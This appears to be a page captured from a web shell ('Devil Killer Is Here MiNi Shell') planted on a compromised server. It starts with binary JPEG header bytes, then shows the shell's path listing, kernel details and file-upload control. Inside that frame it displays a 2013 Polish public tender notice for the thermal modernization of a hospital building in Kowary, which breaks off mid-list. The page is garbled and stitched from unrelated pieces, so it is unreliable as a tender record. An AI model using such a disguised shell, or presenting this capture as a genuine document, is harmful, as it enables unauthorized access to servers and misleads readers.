JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130520/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20130520/81051-N-2013.html

<p class="kh_header"><b>Jelenia Góra: Termomodernizacja budynku szpitala Wysoka Łąka 
w Kowarach- w formule _zaprojektuj i wybuduj_</b><br>
<b>Numer ogłoszenia: 81051 - 2013; data zamieszczenia: 20.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzkie Centrum Szpitalne Kotliny Jeleniogórskiej , ul. Ogińskiego 6, 58-506 Jelenia Góra, woj. dolnośląskie, tel. 75 7537286, faks 75 7543883.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spzoz.jgora.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Termomodernizacja budynku szpitala Wysoka Łąka 
w Kowarach- w formule _zaprojektuj i wybuduj_.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem  zamówienia jest zaprojektowanie i wykonanie Termomodernizacji Budynku szpitala Wysoka Łąka w Kowarach, to jest sporządzenie projektu budowlanego, uzyskanie pozwolenia na budowę, sporządzenie projektów wykonawczych, specyfikacji technicznych wykonania i odbioru robót budowlanych, wykonanie robót budowlanych na podstawie sporządzonej Dokumentacji Projektowej, osiągnięcie efektu energetycznego polegającego na zmniejszeniu rocznego zapotrzebowania na ciepło do celów c.o. i c.w.uż. o co najmniej 1596MWh.   Przedmiot zamówienia obejmuje:   sporządzenie kompletnej Dokumentacji Projektowej w  formie drukowanych tomów tekstowo- rysunkowych w 5 egzemplarzach oraz zapisie cyfrowym  łącznie   z uzyskaniem mapy do celów projektowych terenu objętego zamierzeniem  oraz uzyskanie wszelkich wymaganych przepisami szczególnymi uzgodnień, opinii właściwych organów oraz pozwoleń w szczególności pozwolenia na prowadzenie robót budowlanych przy zabytku od Dolnośląskiego Wojewódzkiego Konserwatora Zabytków we Wrocławiu- Delegatura w Jeleniej Górze, jak również wszelkich innych ekspertyz   i opracowań, których potrzeba ujawni się w trakcie prac projektowych i realizacji; opracowanie  planu bezpieczeństwa i ochrony zdrowia  zgodnie z wymogami rozporządzenie  Ministra Infrastruktury  z 23.06.2003 r.  w sprawie  informacji dotyczącej bezpieczeństwa i ochrony zdrowia oraz  planu  bezpieczeństwa  i ochrony zdrowia (Dz.U. Nr 120, poz.1126 , ze zm.) oraz projektu organizacji budowy i technologii robót dla zadania będącego  przedmiotem  zamówienia; program zapewnienia jakości; realizację robót budowlanych zgodnie z opracowaną i uzgodnioną            z Zamawiającym, w zakresie przyjętych rozwiązań Dokumentacją Projektową oraz uzyskaną, ostateczną decyzją o pozwoleniu na budowę; sporządzenie Dokumentacji Powykonawczej obejmującej między innymi: powykonawczy audyt energetyczny budynku potwierdzający uzyskanie co najmniej wymaganej  oszczędności energii, świadectwo charakterystyki energetycznej budynku, instrukcję obsługi i eksploatacji urządzeń powstałych   w budynku w wyniku realizacji przedmiotu zamówienia;             sporządzenie powykonawczej inwentaryzacji geodezyjnej;                                                         wykonanie powykonawczej dokumentacji termograficznej ocieplonych przegród,                             
             tj. stropu poddasza użytkowego, ścian zewnętrznych z zamontowaną stolarką; uczestnictwo w  wszelkich czynnościach odbiorowych  przedmiotu zamówienia;   przygotowanie dokumentacji niezbędnej do uzyskania pozwolenia na użytkowanie, w imieniu Zamawiającego złożenie kompletnego wniosku              o wydanie pozwolenia na użytkowanie oraz udział podczas kontroli PINB -
jeśli uzyskanie pozwolenia na użytkowanie wymagane będzie zapisami              w decyzji zatwierdzającej projekt budowlany i udzielającej pozwolenia na budowę, 
rozruch i uruchomienie urządzeń; usuwanie wad w ramach rękojmi za wady fizyczne i gwarancji  jakości                w odniesieniu do przedmiotu zamówienia;
 uczestnictwo, na wezwanie Zamawiającego, w przeglądach gwarancyjnych,       w   ramach wynagrodzenia ryczałtowego; zapewnienie i prowadzenie obsługi geodezyjnej i geologicznej budowy; zapewnienie nadzoru autorskiego w ramach wynagrodzenia ryczałtowego za wykonanie przedmiotu zamóienia.
Wymagania Zamawiającego w stosunku do wykonania przedmiotu zamówienia: przygotowanie terenu budowy, zastosowania materiałów i urządzeń posiadających świadectwa dopuszczenia do stosowania w budownictwie, wymagane prawem atesty i aprobaty, dokumentację techniczno-ruchową w języku polskim, a w przypadku ich braku- instrukcje, spełniające wymogi szczegółowych norm i przepisów z zakresu BHP, sanitarnych i przeciw pożarowych oraz określony w Programie Funkcjonalno-Użytkowym (w skrócie: PF-U)  standard jakościowy;
      zastosowania kolektorów słonecznych o parametrach funkcjonalnych  i wydajnościowych nie  gorszych niż określone w PF-U;wykonania rur dobiegowych od kolektorów słonecznych do pomieszczeń   budynku, w których usytuowane będą pojemnościowe podgrzewacze c.w.uż. z rur preizolowanych prowadzonych w ziemi, natomiast w budynku - rur  stalowych bez szwu;
  zastosowania do produkcji c.w.uż. pojemnościowego podgrzewacza wody
                     zasilanego przez pompę obiegową; przyjęcie pompy obiegowej układu solarnego zapewniającej przepływ i wysokość       podnoszenia wynikający z opracowanej Dokumentacji Projektowej;   wykonanie instalacji automatyki i sterowania pracą instalacji solarnej  o parametrach nie  gorszych niż określone w PF-U; wykonanie nowej instalacji wewnętrznej centralnego ogrzewania wodnego,  
  niskotemperaturowego; zmodernizowanie  istniejących instalacji: elektrycznej, c.o. i c.w.uż. w budynku,  wymiana istniejącej izolacji termicznej przewodów c.w.uż.; zmodernizowanie istniejącej instalacji automatyki  w budynku;
ocieplenie stropu poddasza użytkowego wełną mineralną o parametrach  nie   
 gorszych niż określone w PF-U;    wymiana okien wraz z parapetami (wewnętrzne)  i drzwi balkonowych    o parametrach  nie  gorszych niż określone w PF-U; w przypadku parapetów należy zastosować materiał imitujący granit o powierzchni gładkiej i zmywalnej odporny na dezynfekcje środkami chemicznymi;
 renowacja istniejących, starych  krat okiennych - ok.117m2;
    odtworzenie do stanu pierwotnego terenu po przeprowadzonych robotach 
  ziemnych.
 Szczegółowe minimalne wymagania dotyczące sposobu wykonania przedmiotu zamówienia, w tym szczególnie parametry techniczne  dla materiałów i urządzeń zostały ujęty  w Programie Funkcjonalno-Użytkowym..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje zamówienie uzupełniające. Zamówienie uzupełniające może być udzielone wybranemu, w drodze niniejszego postępowania, wykonawcy robót budowlanych, kiedy zaistnieje konieczność  powtórzenia tego samego rodzaju i zamówienia dotyczącego                                                                                             przedmiotu zamówienia podstawowego, o wartości nie większej niż  30% wartości zamówienia podstawowego  i w okresie do 3 lat od udzielenia tego zamówienia.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 71.20.00.00-0, 71.22.00.00-6, 71.22.10.00-3, 71.32.00.00-7, 71.32.20.00-1, 45.32.00.00-6, 45.42.00.00-7, 45.26.00.00-7, 45.33.10.00-6, 45.31.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Każdy Wykonawca zobowiązany jest zabezpieczyć swoją ofertę wadium w wysokości:  70 000,00  zł (słownie złotych: siedemdziesiąt tysięcy).Wadium musi być wniesione w formie zgodnej z art. 45 ust. 6 Ustawy, tj. pieniądzu ;
poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-  
                           kredytowej ;       gwarancjach bankowych;
 gwarancjach ubezpieczeniowych; poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2
               ustawy z 09.11.2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości   (tekst jednolity z 2007 r.  Dz. U. Nr 42, poz. 275, z późniejszymi zmianami).  Wadium musi być wniesione przed upływem terminu składania ofert. Zamawiający przyjmuje, iż wadium w formie pieniężnej zostanie wniesione z chwilą uznania rachunku bankowego Zamawiającego. 
Wadium wnoszone w dopuszczonej przez Zamawiającego formie innej, niż  pieniądz,  Wykonawca wnosi do Zamawiającego  przy czym, w takim przypadku za termin doręczenia uważa się datę jego zdeponowania w sekretariacie WCSzKJ, budynek D, parter, pokój 171. 
  Wadium  w dopuszczonej  przez Zamawiającego formie innej, niż pieniądz, Wykonawca  może dołączyć do oferty - pod warunkiem , że umieszczone zostanie w osobnej kopercie opisanej (nazwa i adres wykonawcy, adnotacja:Wadium - przetarg nieograniczony pn. termomodernizacja-Kowary), w sposób  umożliwiający Zamawiającemu   zdeponowanie  wadium - bez konieczności  naruszenia koperty, w której znajduje się oferta. W przypadku wnoszenia przez Wykonawcę wadium w formie gwarancji lub poręczeń muszą one być co najmniej bezwarunkowe, nieodwołalne, nie podlegające przeniesieniu na osoby trzecie i płatne na pierwsze pisemne żądanie Zamawiającego. 
  Gwarancje i poręczenia muszą zawierać (oprócz elementów właściwych dla każdej                 z nich, określonych przepisami prawa, w tym szczególnie oświadczenie                                o odpowiedzialności za wszystkie przypadki powodujące utratę wadium przez wykonawcę):
 nazwę i adres Zamawiającego; nazwa postępowania;termin ważności wadium - odpowiadający terminowi związania ofertą. Wadium wnoszone w pieniądzu należy przelać ( tj. dokonać wyłącznie przelewem  na konto Zamawiającego) na następujący rachunek Zamawiającego prowadzony w banku PKO Bank Polski S.A.  nr 23 1020 2137 0000 9702 0129 1483, z dopiskiem Wadium - przetarg nieograniczony pn. termomodernizacja -Kowary.
                Wskazane jest, aby kopia polecenia przelewu na konto Zamawiającego potwierdzona
                za zgodność z oryginałem przez Wykonawcę została dołączona do oferty. 
 Zamawiający zwróci wadium  wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem ust.4a art. 46 Ustawy.
 Wadium wniesione w pieniądzu Zamawiający zwraca wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę. 
Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy. 
                                                                                                                                                                                                                        Okoliczności zatrzymania wadium oraz zasady jego zaliczenia na poczet zabezpieczenia
            należytego wykonania umowy określa Ustawa.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku.     Wykonawca potwierdza spełnianie warunku poprzez złożenie Oświadczenia wg  wzoru stanowiącego Załącznik Nr 2;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zobowiązany jest do przedłożenia Wykazu wszystkich   wykonanych robót budowlanych  w okresie ostatnich 5 lat przed upływem terminu  składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, zawierającego ich  rodzaj i wartość oraz daty i miejsce wykonania, potwierdzonych załączeniem dowodów dla najważniejszych robót określających, czy roboty te zostały wykonane        w sposób należyty oraz wskazujących czy zostały wykonane zgodnie z zasadami sztuki budowlanej   i prawidłowo ukończone.Decyzja, które roboty budowlane widniejące w Wykazie są  najważniejsze,  pozostawiona jest Wykonawcy, z zastrzeżeniem treści zdania następnego.Zamawiający uzna warunek za spełniony w oparciu o   złożone przez   Wykonawcę Oświadczenie wg wzoru stanowiącego Załącznik Nr 2    i wykazane w Wykazie wszystkich wykonanych robót budowlanych  realizacje, z których co najmniej dwie(2) dotyczyć powinny zaprojektowania   i wykonania robót budowlanych,  w zakresie których było między innymi ustawienie wolnostojących kolektorów słonecznych z wykonaniem orurowania od kolektorów do pomieszczeń budynku, z wykonaniem instalacji automatyki i sterowania  pracą instalacji solarnej, wykonaniem wewnętrznej instalacji c.o., wykonaniem instalacji elektrycznej. 
Wymagana wartość robót budowlanych  każdej z realizacji - minimum 1 000 000 zł bez podatku od towarów  i usług (VAT). Każda z realizacji musi być poparta załączonymi dowodami potwierdzającymi, że zostały wykonane w sposób należyty oraz wskazujących czy zostały wykonane zgodnie z zasadami sztuki budowlanej   i prawidłowo ukończone. Ww. dowody muszą być wydane przez podmiot na  rzecz, którego te roboty budowlane zostały wykonane.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wyknawca musi wskazać do uczestnictwa w wykonaniu niniejszego zamówienia w szczególności:
1-projektanta wiodącego, który posiada: uprawnienia budowlane do projektowania  w specjalności  instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń do projektowania lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, przy czym nie są wymagane w zakresie wodociągów i kanalizacji;  co najmniej 60-miesięczne doświadczenie w projektowaniu  w zakresie posiadanych uprawnień, uczestniczył w projektowaniu co najmniej jednej instalacji kolektorów słonecznych z pracami towarzyszącymi  oraz   w obiektach służby zdrowia wewnętrznej instalacji c.o. dla powierzchni ogrzewanej co najmniej 5 000m2; 2- projektanta, który posiada:
  uprawnienia budowlane do projektowania  w specjalności  konstrukcyjno-budowlanej bez ograniczeń do projektowania lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów; co najmniej 36-miesięczne doświadczenie w projektowaniu   w zakresie posiadanych uprawnień; 3-  projektanta, który posiada:   uprawnienia budowlane do projektowania  w specjalności  instalacyjnej  w zakresie  sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych  bez ograniczeń do projektowania lub odpowiadające im ważne  uprawnienia budowlane, które zostały wydane na podstawie wcześniej  obowiązujących przepisów przy czym nie są wymagane w zakresie sieci; co najmniej 36-miesięczne doświadczenie w projektowaniu w zakresie posiadanych uprawnień;  4-  projektanta - inżyniera ds. AKPiA, który posiada:         wykształcenie wyższe techniczne w specjalności automatyka lub   automatyka i pomiary lub elektronika lub elektryczne oraz  doświadczenie zawodowe w projektowaniu instalacji automatyki                    i sterowania  pracą instalacji solarnej;  5 - kierownika budowy, który posiada:
 uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności konstrukcyjno-budowlanej lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów; co najmniej 60-miesięczne doświadczenia zawodowego na stanowisku kierownika budowy w zakresie posiadanych uprawnień;  odbytą co najmniej 2-letnią praktykę zawodową na budowie przy      zabytkach nieruchomych wpisanych do rejestru zabytków; 6 -  kierownika robót lub majstra, który posiada: uprawnienia budowlane do kierowania robotami w specjalności  instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń do projektowania lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, przy czym nie są wymagane w zakresie wodociągów  i kanalizacji; co najmniej 60-miesięczne doświadczenie zawodowego na stanowisku kierownika budowy w zakresie posiadanych uprawnień; 7 -  kierownika robót lub majstra, który posiada: uprawnienia budowlane do kierowania robotami w specjalności  instalacyjnej  w zakresie  sieci, instalacji i urządzeń elektrycznych  i elektroenergetycznych bez ograniczeń do projektowania lub odpowiadające im ważne  uprawnienia budowlane, które zostały wydane na podstawie wcześniej  obowiązujących przepisów przy czym nie są wymagane w zakresie sieci; posiada co najmniej 24-miesięczne doświadczenie w kierowaniu robotami   w zakresie posiadanych uprawnień;       8 -  inżyniera ds. AKPiA, który posiada:       
  wykształcenie wyższe techniczne w specjalności automatyka lub automatyka
                                      i pomiary lub elektronika lub elektryczne oraz doświadczenie zawodowe w uruchamianiu i programowaniu  instalacji automatyki  i sterowania  pracą instalacji solarnej. 
 Przez wymagany  minimalny okres  doświadczenia zawodowego należy   rozumieć łączną ilość miesięcy przepracowanych  odpowiednio na stanowisku projektanta lub kierownika budowy, w okresie od daty uzyskania uprawnień budowlanych do daty ukazania się ogłoszenia    o zamówieniu w Biuletynie Zamówień Publicznych .
 Jeżeli wskazana wyżej osoba jest  obywatelem państw członkowskich Unii Europejskiej i nabyła w tych państwach, poza granicami Rzeczypospolitej Polskiej, kwalifikacje zawodowe do wykonywania samodzielnych funkcji     w budownictwie, mając na względzie obowiązujące w Polsce przepisy prawa krajowego wymagane będzie od tej osoby uznanie jej kwalifikacji zawodowych .
Zamawiający uzna warunek za spełniony w oparciu o złożone przez Wykonawcę  Oświadczenie wg wzoru stanowiącego Załącznik Nr 2,  przedłożony Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia wraz z  Oświadczeniem o posiadaniu przez te osoby wymaganych uprawnień.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego  warunku. Wykonawca  potwierdza spełnianie warunku poprzez złożenie Oświadczenia  wg wzoru stanowiącego Załącznik Nr 2.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>co najmniej dwie(2) realizacje dotyczyć powinny zaprojektowania   i wykonania robót budowlanych,  w zakresie których było między innymi ustawienie wolnostojących kolektorów słonecznych z wykonaniem orurowania od kolektorów do pomieszczeń budynku, z wykonaniem instalacji automatyki i sterowania  pracą instalacji solarnej, wykonaniem wewnętrznej instalacji c.o., wykonaniem instalacji elektrycznej. 
Wymagana wartość robót budowlanych  każdej z realizacji - minimum 1 000 000 zł bez podatku od towarów  i usług (VAT). 
Każda z realizacji musi być poparta załączonymi dowodami potwierdzającymi, że zostały wykonane w sposób należyty oraz wskazujących czy zostały wykonane zgodnie z zasadami sztuki budowlanej   i prawidłowo ukończone. Ww. dowody muszą być wydane przez podmiot na  rzecz, którego te roboty budowlane zostały wykonane.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
